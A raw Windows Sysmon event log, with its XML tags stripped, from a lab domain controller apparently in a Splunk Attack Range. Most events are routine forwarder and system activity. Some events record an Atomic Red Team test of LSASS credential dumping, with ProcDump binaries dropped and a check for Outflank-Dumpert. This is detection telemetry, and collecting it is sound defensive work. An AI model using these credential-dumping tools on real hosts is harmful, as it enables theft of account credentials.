21:09:53.854{4DB9351A-A321-60D3-2F06-00000000CF01}58926636C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
23542300x800000000000000024885Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:53.651{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=ACF7CCB2AE94B5EB9CEC5948E41F83DD,SHA256=4E665CF2103838A261F5F4364E8523B693ACE380E70CC5CB4A4CF46A365F20D3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000024884Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:53.635{4DB9351A-9DEC-60D3-3800-00000000CF01}33643396C:\Windows\system32\conhost.exe{4DB9351A-A321-60D3-2F06-00000000CF01}5892C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024883Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:53.635{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x800000000000000024882Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:53.635{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024881Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:53.635{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024880Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:09:53.635{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024879Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:53.635{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A321-60D3-2F06-00000000CF01}5892C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000024878Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:53.635{4DB9351A-9DEA-60D3-3000-00000000CF01}24043520C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4DB9351A-A321-60D3-2F06-00000000CF01}5892C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000024877Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:53.636{4DB9351A-A321-60D3-2F06-00000000CF01}5892C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4DB9351A-9DDB-60D3-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000024876Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:53.260{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7709D494C5BB89B9176D8A00F82BDFA7,SHA256=2477952977AE40DB9C83B1E81B8473C92AEFF8454DE5285129A1A95C0934BB29,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x800000000000000024875Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:53.245{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=60D97EC5997007213014AF546E4C68E0,SHA256=7EC0A6815114393EBA09FC51C4DD4830C0C07A30A17164C6B95301187137B994,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024874Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:53.245{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5A7AA5644A13D2BCA540FC5AF994063D,SHA256=7F8A307F82AE8C81249D3559068C7EE5D6F0F485A659A4403E545980F9050833,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024873Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:53.245{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=96231D302A43B7C38B48314495C695DA,SHA256=95CA0B452E620A7D8244D407485FF4D4812EA8A1B348612A347466D0B6801A69,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024908Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:09:54.979{4DB9351A-A320-60D3-2D06-00000000CF01}5160ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000024907Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localEXE2021-06-23 21:09:54.979{4DB9351A-A320-60D3-2D06-00000000CF01}5160C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\atomics\T1003.001\bin\procdump.exe2021-06-23 21:09:54.979 11241100x800000000000000024906Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:54.932{4DB9351A-A320-60D3-2D06-00000000CF01}5160C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\Procdump\Eula.txt2021-06-23 21:09:54.932 23542300x800000000000000024905Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:54.932{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F707AC16CB43B42CC48D84E51FBE8A9F,SHA256=DCE3C24696F3383D343056A22F99AA18E8E66995F86A409DB5DA1AEEAB2098B8,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000024904Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localEXE2021-06-23 21:09:54.917{4DB9351A-A320-60D3-2D06-00000000CF01}5160C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\Procdump\procdump64a.exe2021-06-23 21:09:54.917 11241100x800000000000000024903Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localEXE2021-06-23 
21:09:54.885{4DB9351A-A320-60D3-2D06-00000000CF01}5160C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\Procdump\procdump64.exe2021-06-23 21:09:54.885 11241100x800000000000000024902Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localEXE2021-06-23 21:09:54.854{4DB9351A-A320-60D3-2D06-00000000CF01}5160C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\Procdump\procdump.exe2021-06-23 21:09:54.854 23542300x800000000000000024901Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:54.635{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=ABB51491C2F3803ADDA46BB7973712AB,SHA256=4949E2CA1B0A9E1AEFC5E36DC486FF23ED49E5636CE9ACF4D7841BB8157F8294,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000024900Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:54.495{4DB9351A-9DEC-60D3-3800-00000000CF01}33643396C:\Windows\system32\conhost.exe{4DB9351A-A322-60D3-3006-00000000CF01}7160C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024899Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:09:55.339{4DB9351A-A273-60D3-3C05-00000000CF01}66084360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A323-60D3-3206-00000000CF01}4356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+381e70|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2f8cd5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c3b1e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c01f5|UNKNOWN(00007FFF5B97FD63) 10341000x800000000000000024937Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:55.323{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024936Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:09:55.323{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024935Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:55.323{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024934Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:09:55.323{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024933Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:55.323{4DB9351A-9E1D-60D3-8B00-00000000CF01}47084872C:\Windows\system32\csrss.exe{4DB9351A-A323-60D3-3206-00000000CF01}4356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000024932Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:09:55.323{4DB9351A-A273-60D3-3C05-00000000CF01}66084360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A323-60D3-3206-00000000CF01}4356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beaa995(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beaa7fc(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bf3392d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bea2a82(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9c982034(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be6802a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa
57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9becba9c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bead93c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be9e65c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bedacff(wow64) 154100x800000000000000024931Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:55.336{4DB9351A-A323-60D3-3206-00000000CF01}4356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {if (Test-Path C:\AtomicRedTeam\atomics\T1003.001\bin\Outflank-Dumpert.exe) {exit 0} else {exit 1}} 
C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{4DB9351A-9F2A-60D3-AB7C-0C0000000000}0xc7cab2HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 23542300x800000000000000024930Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:55.229{4DB9351A-A323-60D3-3106-00000000CF01}6136ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000024929Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:53.180{4DB9351A-A320-60D3-2D06-00000000CF01}5160C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-663.attackrange.local61525-false152.199.4.33-443https 354300x800000000000000024928Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:53.153{4DB9351A-9DEA-60D3-2D00-00000000CF01}2188C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local55677- 10341000x800000000000000024927Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
